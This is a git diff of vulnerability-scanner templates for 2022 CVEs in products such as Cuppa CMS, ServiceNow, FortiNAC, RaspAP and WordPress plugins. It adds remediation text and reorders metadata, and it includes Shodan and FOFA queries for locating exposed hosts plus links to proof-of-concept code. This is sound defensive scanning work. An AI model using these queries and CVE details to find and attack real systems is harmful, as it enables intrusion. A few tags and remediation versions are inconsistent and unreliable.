5d5cea807e..1898e9c35e 100644 --- a/http/cves/2022/CVE-2022-38295.yaml +++ b/http/cves/2022/CVE-2022-38295.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cuppa CMS v1.0 was discovered to contain a cross-site scripting vulnerability at /table_manager/view/cu_user_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field under the Add New Group function. + remediation: | + To remediate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://github.com/CuppaCMS/CuppaCMS - https://nvd.nist.gov/vuln/detail/CVE-2022-38295 @@ -15,11 +17,11 @@ info: cve-id: CVE-2022-38295 cwe-id: CWE-79 epss-score: 0.00533 - cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* epss-percentile: 0.74162 + cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: cuppacms product: cuppacms tags: cve,cve2022,xss,cuppa,authenticated diff --git a/http/cves/2022/CVE-2022-38296.yaml b/http/cves/2022/CVE-2022-38296.yaml index cba603dc48..58bac98117 100644 --- a/http/cves/2022/CVE-2022-38296.yaml +++ b/http/cves/2022/CVE-2022-38296.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Cuppa CMS v1.0 was discovered to contain an arbitrary file upload vulnerability via the File Manager. + remediation: | + Apply the latest patch or upgrade to a newer version of Cuppa CMS to mitigate this vulnerability. reference: - https://github.com/CuppaCMS/CuppaCMS - https://nvd.nist.gov/vuln/detail/CVE-2022-38296 @@ -15,11 +17,11 @@ info: cve-id: CVE-2022-38296 cwe-id: CWE-434 epss-score: 0.01161 - cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* epss-percentile: 0.8311 + cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: cuppacms product: cuppacms tags: cve,cve2022,rce,cuppa,intrusive diff --git a/http/cves/2022/CVE-2022-38463.yaml b/http/cves/2022/CVE-2022-38463.yaml index 5c243655e9..7276d2328d 100644 --- a/http/cves/2022/CVE-2022-38463.yaml +++ b/http/cves/2022/CVE-2022-38463.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | ServiceNow through San Diego Patch 4b and Patch 6 contains a cross-site scripting vulnerability in the logout functionality, which can enable an unauthenticated remote attacker to execute arbitrary JavaScript. + remediation: | + Apply the latest security patches provided by ServiceNow to mitigate this vulnerability. reference: - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1156793 - https://nvd.nist.gov/vuln/detail/CVE-2022-38463 @@ -15,14 +17,14 @@ info: cve-id: CVE-2022-38463 cwe-id: CWE-79 epss-score: 0.00122 - cpe: cpe:2.3:a:servicenow:servicenow:san_diego:patch_4:*:*:*:*:*:* epss-percentile: 0.45824 + cpe: cpe:2.3:a:servicenow:servicenow:san_diego:patch_4:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.title:"ServiceNow" verified: true + max-request: 1 vendor: servicenow product: servicenow + shodan-query: http.title:"ServiceNow" tags: cve,cve2022,servicenow,xss http: diff --git a/http/cves/2022/CVE-2022-38467.yaml b/http/cves/2022/CVE-2022-38467.yaml index 4552c75486..4b1dfe2c0a 100644 --- a/http/cves/2022/CVE-2022-38467.yaml +++ b/http/cves/2022/CVE-2022-38467.yaml @@ -6,26 +6,26 @@ info: severity: medium description: | The plugin does not sanitise and escape some parameters from a sample file before outputting them back in the page, leading to Reflected Cross-Site Scripting + remediation: Fixed in version 1.1.1 reference: - https://wpscan.com/vulnerability/4b128c9c-366e-46af-9dd2-e3a9624e3a53 - https://wordpress.org/plugins/crm-perks-forms/ - https://nvd.nist.gov/vuln/detail/CVE-2022-38467 - https://patchstack.com/database/vulnerability/crm-perks-forms/wordpress-crm-perks-forms-plugin-1-1-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve - remediation: Fixed in version 1.1.1 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-38467 cwe-id: CWE-79 epss-score: 0.00064 - cpe: cpe:2.3:a:crmperks:crm_perks_forms:*:*:*:*:*:wordpress:*:* epss-percentile: 0.26173 + cpe: cpe:2.3:a:crmperks:crm_perks_forms:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: crmperks product: crm_perks_forms + framework: wordpress tags: crm-perks-forms,wpscan,cve,cve2022,wordpress,wp,wp-plugin,xss http: diff --git a/http/cves/2022/CVE-2022-38553.yaml b/http/cves/2022/CVE-2022-38553.yaml index 9e86c776ce..6b3c874da9 100644 --- a/http/cves/2022/CVE-2022-38553.yaml +++ b/http/cves/2022/CVE-2022-38553.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Academy Learning Management System before 5.9.1 contains a cross-site scripting vulnerability via the Search parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade to Academy Learning Management System version 5.9.1 or later to mitigate the XSS vulnerability. reference: - https://www.youtube.com/watch?v=yFiZffHoeKs&ab_channel=4websecurity - https://github.com/4websecurity/CVE-2022-38553 @@ -18,14 +20,14 @@ info: cve-id: CVE-2022-38553 cwe-id: CWE-79 epss-score: 0.001 - cpe: cpe:2.3:a:creativeitem:academy_learning_management_system:*:*:*:*:*:*:*:* epss-percentile: 0.40523 + cpe: cpe:2.3:a:creativeitem:academy_learning_management_system:*:*:*:*:*:*:*:* metadata: - max-request: 1 - google-query: intext:"Study any topic, anytime" verified: true + max-request: 1 vendor: creativeitem product: academy_learning_management_system + google-query: intext:"Study any topic, anytime" tags: cve,cve2022,academylms,xss http: diff --git a/http/cves/2022/CVE-2022-38637.yaml b/http/cves/2022/CVE-2022-38637.yaml index a3dc39d720..f4f6a2e7e4 100644 --- a/http/cves/2022/CVE-2022-38637.yaml +++ b/http/cves/2022/CVE-2022-38637.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/user-login.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.youtube.com/watch?v=m8nW0p69UHU - https://owasp.org/www-community/attacks/SQL_Injection @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-38637 cwe-id: CWE-89 epss-score: 0.01481 - cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.8515 + cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"Hospital Management System" verified: true + max-request: 1 vendor: hospital_management_system_project product: hospital_management_system + shodan-query: http.html:"Hospital Management System" tags: cve,cve2022,hms,cms,sqli,auth-bypass http: diff --git a/http/cves/2022/CVE-2022-38794.yaml b/http/cves/2022/CVE-2022-38794.yaml index 1f6cd9cd95..b94e02c18e 100644 --- a/http/cves/2022/CVE-2022-38794.yaml +++ b/http/cves/2022/CVE-2022-38794.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Zaver through 2020-12-15 is vulnerable to local file inclusion via the GET /.. substring. + remediation: | + To remediate this vulnerability, ensure that user input is properly validated and sanitized before being used in file inclusion operations. reference: - https://github.com/zyearn/zaver/issues/22 - https://nvd.nist.gov/vuln/detail/CVE-2022-38794 @@ -15,8 +17,8 @@ info: cve-id: CVE-2022-38794 cwe-id: CWE-22 epss-score: 0.00318 - cpe: cpe:2.3:a:zaver_project:zaver:*:*:*:*:*:*:*:* epss-percentile: 0.66648 + cpe: cpe:2.3:a:zaver_project:zaver:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zaver_project diff --git a/http/cves/2022/CVE-2022-38817.yaml b/http/cves/2022/CVE-2022-38817.yaml index 08cb37b985..486b7959b7 100644 --- a/http/cves/2022/CVE-2022-38817.yaml +++ b/http/cves/2022/CVE-2022-38817.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Dapr Dashboard 0.1.0 through 0.10.0 is susceptible to improper access control. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade Dapr Dashboard to a version that includes the fix for CVE-2022-38817 or apply the necessary patches provided by the vendor. reference: - https://github.com/dapr/dashboard/issues/222 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38817 @@ -17,13 +19,13 @@ info: cve-id: CVE-2022-38817 cwe-id: CWE-306 epss-score: 0.0075 - cpe: cpe:2.3:a:linuxfoundation:dapr_dashboard:*:*:*:*:*:*:*:* epss-percentile: 0.78669 + cpe: cpe:2.3:a:linuxfoundation:dapr_dashboard:*:*:*:*:*:*:*:* metadata: max-request: 3 - shodan-query: http.title:"Dapr Dashboard" vendor: linuxfoundation product: dapr_dashboard + shodan-query: http.title:"Dapr Dashboard" tags: cve,cve2022,dapr,dashboard,unauth http: diff --git a/http/cves/2022/CVE-2022-38870.yaml b/http/cves/2022/CVE-2022-38870.yaml index 3c143a58cb..4eec3c0609 100644 --- a/http/cves/2022/CVE-2022-38870.yaml +++ b/http/cves/2022/CVE-2022-38870.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Free5gc 3.2.1 is susceptible to information disclosure. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest patch or upgrade to a patched version of Free5gc 3.2.1 to mitigate the vulnerability. reference: - https://github.com/free5gc/free5gc/issues/387 - https://nvd.nist.gov/vuln/detail/CVE-2022-38870 @@ -15,13 +17,13 @@ info: cve-id: CVE-2022-38870 cwe-id: CWE-306 epss-score: 0.00334 - cpe: cpe:2.3:a:free5gc:free5gc:3.2.1:*:*:*:*:*:*:* epss-percentile: 0.67526 + cpe: cpe:2.3:a:free5gc:free5gc:3.2.1:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.title:"free5GC Web Console" vendor: free5gc product: free5gc + shodan-query: http.title:"free5GC Web Console" tags: cve,cve2022,free5gc,exposure http: diff --git a/http/cves/2022/CVE-2022-3908.yaml b/http/cves/2022/CVE-2022-3908.yaml index 63c895855b..085cd55ce7 100644 --- a/http/cves/2022/CVE-2022-3908.yaml +++ b/http/cves/2022/CVE-2022-3908.yaml @@ -6,25 +6,25 @@ info: severity: medium description: | WordPress Helloprint plugin before 1.4.7 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: Fixed in version 1.4.7. reference: - https://wpscan.com/vulnerability/c44802a0-8cbe-4386-9523-3b6cb44c6505 - https://wordpress.org/plugins/helloprint/ - https://nvd.nist.gov/vuln/detail/CVE-2022-3908 - remediation: Fixed in version 1.4.7. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-3908 cwe-id: CWE-79 epss-score: 0.00071 - cpe: cpe:2.3:a:helloprint:helloprint:*:*:*:*:*:wordpress:*:* epss-percentile: 0.29012 + cpe: cpe:2.3:a:helloprint:helloprint:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: helloprint product: helloprint + framework: wordpress tags: xss,wordpress,wp-plugin,helloprint,cve,cve2022,wp,authenticated,wpscan http: diff --git a/http/cves/2022/CVE-2022-39195.yaml b/http/cves/2022/CVE-2022-39195.yaml index b465fbedd1..4a3d0ba77c 100644 --- a/http/cves/2022/CVE-2022-39195.yaml +++ b/http/cves/2022/CVE-2022-39195.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | LISTSERV 17 web interface contains a cross-site scripting vulnerability. An attacker can inject arbitrary JavaScript or HTML via the "c" parameter, thereby possibly allowing the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/170552/LISTSERV-17-Cross-Site-Scripting.html - https://peach.ease.lsoft.com/scripts/wa-PEACH.exe?A0=LSTSRV-L @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-39195 cwe-id: CWE-79 epss-score: 0.00125 - cpe: cpe:2.3:a:lsoft:listserv:17.0:*:*:*:*:*:*:* epss-percentile: 0.46238 + cpe: cpe:2.3:a:lsoft:listserv:17.0:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: http.html:"LISTSERV" verified: true + max-request: 2 vendor: lsoft product: listserv + shodan-query: http.html:"LISTSERV" tags: cve,cve2022,xss,listserv,packetstorm http: diff --git a/http/cves/2022/CVE-2022-3933.yaml b/http/cves/2022/CVE-2022-3933.yaml index 28f0a14b6c..4bbd474257 100644 --- a/http/cves/2022/CVE-2022-3933.yaml +++ b/http/cves/2022/CVE-2022-3933.yaml @@ -6,25 +6,25 @@ info: severity: medium description: | WordPress Essential Real Estate plugin before 3.9.6 contains an authenticated cross-site scripting vulnerability. The plugin does not sanitize and escape some parameters, which can allow someone with a role as low as admin to inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow theft of cookie-based authentication credentials and launch of other attacks. + remediation: Fixed in version 3.9.6. reference: - https://wpscan.com/vulnerability/6395f3f1-5cdf-4c55-920c-accc0201baf4 - https://wordpress.org/plugins/essential-real-estate/advanced/ - https://nvd.nist.gov/vuln/detail/CVE-2022-3933 - remediation: Fixed in version 3.9.6. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2022-3933 cwe-id: CWE-79 epss-score: 0.00077 - cpe: cpe:2.3:a:g5theme:essential_real_estate:*:*:*:*:*:wordpress:*:* epss-percentile: 0.31826 + cpe: cpe:2.3:a:g5theme:essential_real_estate:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: g5theme product: essential_real_estate + framework: wordpress tags: wpscan,cve2022,authenticated,wordpress,wp-plugin,wp,essential-real-estate,cve,xss http: diff --git a/http/cves/2022/CVE-2022-3934.yaml b/http/cves/2022/CVE-2022-3934.yaml index 395e187efb..754e34be11 100644 --- a/http/cves/2022/CVE-2022-3934.yaml +++ b/http/cves/2022/CVE-2022-3934.yaml @@ -6,24 +6,24 @@ info: severity: medium description: | WordPress FlatPM plugin before 3.0.13 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape certain parameters before outputting them back in pages, which can be exploited against high privilege users such as admin. An attacker can steal cookie-based authentication credentials and launch other attacks. + remediation: Fixed in version 3.0.13. reference: - https://wpscan.com/vulnerability/ab68381f-c4b8-4945-a6a5-1d4d6473b73a - https://nvd.nist.gov/vuln/detail/CVE-2022-3934 - remediation: Fixed in version 3.0.13. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2022-3934 cwe-id: CWE-79 epss-score: 0.00077 - cpe: cpe:2.3:a:mehanoid:flat_pm:*:*:*:*:*:wordpress:*:* epss-percentile: 0.31826 + cpe: cpe:2.3:a:mehanoid:flat_pm:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: mehanoid product: flat_pm + framework: wordpress tags: authenticated,wpscan,cve,cve2022,xss,flatpm,wordpress,wp-plugin http: diff --git a/http/cves/2022/CVE-2022-3980.yaml b/http/cves/2022/CVE-2022-3980.yaml index 2f12dee3f9..4dc0caad57 100644 --- a/http/cves/2022/CVE-2022-3980.yaml +++ b/http/cves/2022/CVE-2022-3980.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | An XML External Entity (XXE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between versions 5.0.0 and 9.7.4. + remediation: | + Apply the latest security patches or updates provided by Sophos to mitigate the vulnerability. reference: - https://www.sophos.com/en-us/security-advisories/sophos-sa-20221116-smc-xee - https://nvd.nist.gov/vuln/detail/CVE-2022-3980 @@ -15,15 +17,15 @@ info: cve-id: CVE-2022-3980 cwe-id: CWE-611 epss-score: 0.75202 - cpe: cpe:2.3:a:sophos:mobile:*:*:*:*:*:*:*:* epss-percentile: 0.97737 + cpe: cpe:2.3:a:sophos:mobile:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: http.favicon.hash:-1274798165 - fofa-query: title="Sophos Mobile" + max-request: 1 vendor: sophos product: mobile + shodan-query: http.favicon.hash:-1274798165 + fofa-query: title="Sophos Mobile" tags: cve,cve2022,xxe,ssrf,sophos http: diff --git a/http/cves/2022/CVE-2022-3982.yaml b/http/cves/2022/CVE-2022-3982.yaml index 9b049fb9eb..cce8226756 100644 --- a/http/cves/2022/CVE-2022-3982.yaml +++ b/http/cves/2022/CVE-2022-3982.yaml @@ -6,25 +6,25 @@ info: severity: critical description: | WordPress Booking Calendar plugin before 3.2.2 is susceptible to arbitrary file upload possibly leading to remote code execution. The plugin does not validate uploaded files, which can allow an attacker to upload arbitrary files, such as PHP, and potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: Fixed in 3.2.2. reference: - https://wpscan.com/vulnerability/4d91f3e1-4de9-46c1-b5ba-cc55b7726867 - https://wordpress.org/plugins/booking-calendar/ - https://nvd.nist.gov/vuln/detail/CVE-2022-3982 - remediation: Fixed in 3.2.2. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-3982 cwe-id: CWE-434 epss-score: 0.40713 - cpe: cpe:2.3:a:wpdevart:booking_calendar:*:*:*:*:*:wordpress:*:* epss-percentile: 0.96796 + cpe: cpe:2.3:a:wpdevart:booking_calendar:*:*:*:*:*:wordpress:*:* metadata: - max-request: 3 verified: true - framework: wordpress + max-request: 3 vendor: wpdevart product: booking_calendar + framework: wordpress tags: cve,cve2022,rce,wpscan,wordpress,wp-plugin,wp,booking-calendar,unauthenticated,intrusive http: diff --git a/http/cves/2022/CVE-2022-39952.yaml b/http/cves/2022/CVE-2022-39952.yaml index e373582191..f6c8a14ba9 100644 --- a/http/cves/2022/CVE-2022-39952.yaml +++ b/http/cves/2022/CVE-2022-39952.yaml @@ -6,26 +6,26 @@ info: severity: critical description: | Fortinet FortiNAC is susceptible to arbitrary file write. An external control of the file name or path can allow an attacker to execute unauthorized code or commands via specifically crafted HTTP request, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. Affected versions are 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, and 8.3.7. + remediation: Upgrade to 9.4.1, 9.2.6, 9.2.6, 9.1.8, 7.2.0 or above. reference: - https://fortiguard.com/psirt/FG-IR-22-300 - https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs/ - https://github.com/horizon3ai/CVE-2022-39952 - https://nvd.nist.gov/vuln/detail/CVE-2022-39952 - remediation: Upgrade to 9.4.1, 9.2.6, 9.2.6, 9.1.8, 7.2.0 or above. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-39952 cwe-id: CWE-668 epss-score: 0.9679 - cpe: cpe:2.3:a:fortinet:fortinac:*:*:*:*:*:*:*:* epss-percentile: 0.99533 + cpe: cpe:2.3:a:fortinet:fortinac:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: title:"FortiNAC" verified: true + max-request: 1 vendor: fortinet product: fortinac + shodan-query: title:"FortiNAC" tags: fortinet,fortinac,cve,cve2022,fileupload,rce,intrusive variables: boundaryId: "{{hex_encode(rand_text_alphanumeric(16))}}" diff --git a/http/cves/2022/CVE-2022-39960.yaml b/http/cves/2022/CVE-2022-39960.yaml index 2f8c487390..409c36d598 100644 --- a/http/cves/2022/CVE-2022-39960.yaml +++ b/http/cves/2022/CVE-2022-39960.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Jira Netic Group Export add-on before 1.0.3 contains a missing authorization vulnerability. The add-on does not perform authorization checks, which can allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade to Jira Netic Group Export version 1.0.3 or later to fix the missing authorization issue. reference: - https://gist.github.com/CveCt0r/ca8c6e46f536e9ae69fc6061f132463e - https://marketplace.atlassian.com/apps/1222388/group-export-for-jira/version-history @@ -16,15 +18,15 @@ info: cve-id: CVE-2022-39960 cwe-id: CWE-862 epss-score: 0.24986 - cpe: cpe:2.3:a:netic:group_export:*:*:*:*:*:jira:*:* epss-percentile: 0.96046 + cpe: cpe:2.3:a:netic:group_export:*:*:*:*:*:jira:*:* metadata: - max-request: 1 - shodan-query: http.component:"Atlassian Jira" verified: true - framework: jira + max-request: 1 vendor: netic product: group_export + framework: jira + shodan-query: http.component:"Atlassian Jira" tags: cve,cve2022,atlassian,jira,netic,unauth http: diff --git a/http/cves/2022/CVE-2022-39986.yaml b/http/cves/2022/CVE-2022-39986.yaml index 646caeb040..3ebe24f624 100644 --- a/http/cves/2022/CVE-2022-39986.yaml +++ b/http/cves/2022/CVE-2022-39986.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A Command injection vulnerability in RaspAP 2.8.0 thru 2.8.7 allows unauthenticated attackers to execute arbitrary commands via the cfg_id parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php. + remediation: | + Upgrade to a patched version of RaspAP or apply the vendor-supplied patch to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/174190/RaspAP-2.8.7-Unauthenticated-Command-Injection.html - https://nvd.nist.gov/vuln/detail/CVE-2022-39986 @@ -18,14 +20,14 @@ info: cve-id: CVE-2022-39986 cwe-id: CWE-77 epss-score: 0.60136 - cpe: cpe:2.3:a:raspap:raspap:*:*:*:*:*:*:*:* epss-percentile: 0.97326 + cpe: cpe:2.3:a:raspap:raspap:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.favicon.hash:-1465760059 verified: true + max-request: 1 vendor: raspap product: raspap + shodan-query: http.favicon.hash:-1465760059 tags: packetstorm,cve,cve2020,raspap,rce http: diff --git a/http/cves/2022/CVE-2022-40022.yaml b/http/cves/2022/CVE-2022-40022.yaml index 54883a9c30..c9c099289f 100644 --- a/http/cves/2022/CVE-2022-40022.yaml +++ b/http/cves/2022/CVE-2022-40022.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Microchip Technology (Microsemi) SyncServer S650 was discovered to contain a command injection vulnerability. + remediation: | + Apply the latest security patches or firmware updates provided by the vendor to mitigate this vulnerability. reference: - http://packetstormsecurity.com/files/172907/Symmetricom-SyncServer-Unauthenticated-Remote-Command-Execution.html - https://nvd.nist.gov/vuln/detail/CVE-2022-40022 @@ -18,14 +20,14 @@ info: cve-id: CVE-2022-40022 cwe-id: CWE-77 epss-score: 0.70919 - cpe: cpe:2.3:o:microchip:syncserver_s650_firmware:-:*:*:*:*:*:*:* epss-percentile: 0.9761 + cpe: cpe:2.3:o:microchip:syncserver_s650_firmware:-:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: html:"Symmetricom SyncServer" verified: "true" + max-request: 1 vendor: microchip product: syncserver_s650_firmware + shodan-query: html:"Symmetricom SyncServer" tags: packetstorm,cve,cve2022,syncserver,rce,unauth http: diff --git a/http/cves/2022/CVE-2022-40083.yaml b/http/cves/2022/CVE-2022-40083.yaml index 30c52a8b5f..d945b3963f 100644 --- a/http/cves/2022/CVE-2022-40083.yaml +++ b/http/cves/2022/CVE-2022-40083.yaml @@ -6,18 +6,18 @@ info: severity: critical description: | Labstack Echo 4.8.0 contains an open redirect vulnerability via the Static Handler component. An attacker can leverage this vulnerability to cause server-side request forgery, making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: Download and install 4.9.0, which contains a patch for this issue. reference: - https://github.com/labstack/echo/issues/2259 - https://nvd.nist.gov/vuln/detail/CVE-2022-40083 - remediation: Download and install 4.9.0, which contains a patch for this issue. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H cvss-score: 9.6 cve-id: CVE-2022-40083 cwe-id: CWE-601 epss-score: 0.01662 - cpe: cpe:2.3:a:labstack:echo:4.8.0:*:*:*:*:*:*:* epss-percentile: 0.86042 + cpe: cpe:2.3:a:labstack:echo:4.8.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: labstack diff --git a/http/cves/2022/CVE-2022-40127.yaml b/http/cves/2022/CVE-2022-40127.yaml index 66d8ceffff..97f498bfd1 100644 --- a/http/cves/2022/CVE-2022-40127.yaml +++ b/http/cves/2022/CVE-2022-40127.yaml @@ -6,6 +6,8 @@ info: severity: high description: | A vulnerability in Example Dags of Apache Airflow allows an attacker with UI access who can trigger DAGs, to execute arbitrary commands via manually provided run_id parameter. This issue affects Apache Airflow Apache Airflow versions prior to 2.4.0. + remediation: | + Upgrade AirFlow to version 2.4.0 or later to mitigate this vulnerability. reference: - https://github.com/Mr-xn/CVE-2022-40127 - https://nvd.nist.gov/vuln/detail/CVE-2022-40127 @@ -18,14 +20,14 @@ info: cve-id: CVE-2022-40127 cwe-id: CWE-94 epss-score: 0.17166 - cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* epss-percentile: 0.95397 + cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true - shodan-query: title:"Sign In - Airflow" + max-request: 3 vendor: apache product: airflow + shodan-query: title:"Sign In - Airflow" tags: cve,cve2022,airflow,rce,oast,authenticated http: diff --git a/http/cves/2022/CVE-2022-40359.yaml b/http/cves/2022/CVE-2022-40359.yaml index b9deab4006..58830e72af 100644 --- a/http/cves/2022/CVE-2022-40359.yaml +++ b/http/cves/2022/CVE-2022-40359.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Kae's File Manager through 1.4.7 contains a cross-site scripting vulnerability via a crafted GET request to /kfm/index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks + remediation: | + Upgrade to the latest version of Kae's File Manager plugin (1.4.7) or apply the vendor-provided patch to mitigate the XSS vulnerability. reference: - https://cxsecurity.com/issue/WLB-2022090057 - https://code.google.com/archive/p/kfm/downloads @@ -16,11 +18,11 @@ info: cve-id: CVE-2022-40359 cwe-id: CWE-79 epss-score: 0.00078 - cpe: cpe:2.3:a:kfm_project:kfm:*:*:*:*:*:*:*:* epss-percentile: 0.32136 + cpe: cpe:2.3:a:kfm_project:kfm:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: kfm_project product: kfm tags: cve,cve2022,xss,kfm diff --git a/http/cves/2022/CVE-2022-4050.yaml b/http/cves/2022/CVE-2022-4050.yaml index 59185c4c54..1b4353d0bf 100644 --- a/http/cves/2022/CVE-2022-4050.yaml +++ b/http/cves/2022/CVE-2022-4050.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress JoomSport plugin before 5.2.8 contains a SQL injection vulnerability. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + remediation: | + Update to JoomSport plugin version 5.2.8 or later. reference: - https://wpscan.com/vulnerability/5c96bb40-4c2d-4e91-8339-e0ddce25912f - https://wordpress.org/plugins/joomsport-sports-league-results-management/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-4050 cwe-id: CWE-89 epss-score: 0.31266 - cpe: cpe:2.3:a:beardev:joomsport:*:*:*:*:*:wordpress:*:* epss-percentile: 0.96404 + cpe: cpe:2.3:a:beardev:joomsport:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: beardev product: joomsport + framework: wordpress tags: wpscan,cve,cve2022,wp-plugin,wp,joomsport-sports-league-results-management,wordpress,sqli,unauth http: diff --git a/http/cves/2022/CVE-2022-4057.yaml b/http/cves/2022/CVE-2022-4057.yaml index a60bd5394e..9feb4a4144 100644 --- a/http/cves/2022/CVE-2022-4057.yaml +++ b/http/cves/2022/CVE-2022-4057.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The Autoptimize WordPress plugin before 3.1.0 uses an easily guessable path to store plugin's exported settings and logs. + remediation: | + Upgrade to Autoptimize version 3.1.0 or later to fix the information disclosure vulnerability. reference: - https://wpscan.com/vulnerability/95ee1b9c-1971-4c35-8527-5764e9ed64af - https://wordpress.org/plugins/autoptimize/ @@ -16,15 +18,15 @@ info: cve-id: CVE-2022-4057 cwe-id: CWE-425 epss-score: 0.00177 - cpe: cpe:2.3:a:optimizingmatters:autooptimize:*:*:*:*:*:wordpress:*:* epss-percentile: 0.54176 + cpe: cpe:2.3:a:optimizingmatters:autooptimize:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - publicwww-query: /wp-content/plugins/autoptimize - framework: wordpress + max-request: 2 vendor: optimizingmatters product: autooptimize + framework: wordpress + publicwww-query: /wp-content/plugins/autoptimize tags: wpscan,cve,cve2023,wp,wordpress,wp-plugin,disclosure,autoptimize http: diff 